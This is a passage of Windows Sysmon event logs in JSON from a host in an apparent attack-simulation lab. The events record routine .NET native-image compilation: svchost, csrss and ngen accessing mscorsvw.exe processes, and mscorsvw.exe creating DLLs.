08:07:25.990","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BD-5F25-0000-0010500E1100}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8286,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:26.084\r\nProcessGuid: {41C8662E-22BD-5F25-0000-0010500E1100}\r\nProcessId: 5060\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13c4-0\\UIAutomationProvider.dll\r\nCreationUtcTime: 2020-08-01 08:07:26.084","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:26.084","ProcessGuid":"{41C8662E-22BD-5F25-0000-0010500E1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13c4-0\\UIAutomationProvider.dll","CreationUtcTime":"2020-08-01 08:07:26.084","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8287,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.115\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-001004121100}\r\nTargetProcessId: 2620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.115","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-001004121100}","TargetProcessId":"2620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8288,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.115\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-001004121100}\r\nTargetProcessId: 2620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.115","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-001004121100}","TargetProcessId":"2620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8289,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.115\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-001004121100}\r\nTargetProcessId: 2620\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.115","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-001004121100}","TargetProcessId":"2620","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8290,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.147\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-001075151100}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.147","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-001075151100}","TargetProcessId":"3920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8291,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.147\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-001075151100}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.147","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-001075151100}","TargetProcessId":"3920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8292,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.162\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-001075151100}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.162","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-001075151100}","TargetProcessId":"3920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8293,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:26.443\r\nProcessGuid: {41C8662E-22BE-5F25-0000-001075151100}\r\nProcessId: 3920\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f50-0\\UIAutomationTypes.dll\r\nCreationUtcTime: 2020-08-01 08:07:26.443","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:26.443","ProcessGuid":"{41C8662E-22BE-5F25-0000-001075151100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f50-0\\UIAutomationTypes.dll","CreationUtcTime":"2020-08-01 08:07:26.443","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8294,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.490\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-0010B1D90F00}\r\nTargetProcessId: 1340\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 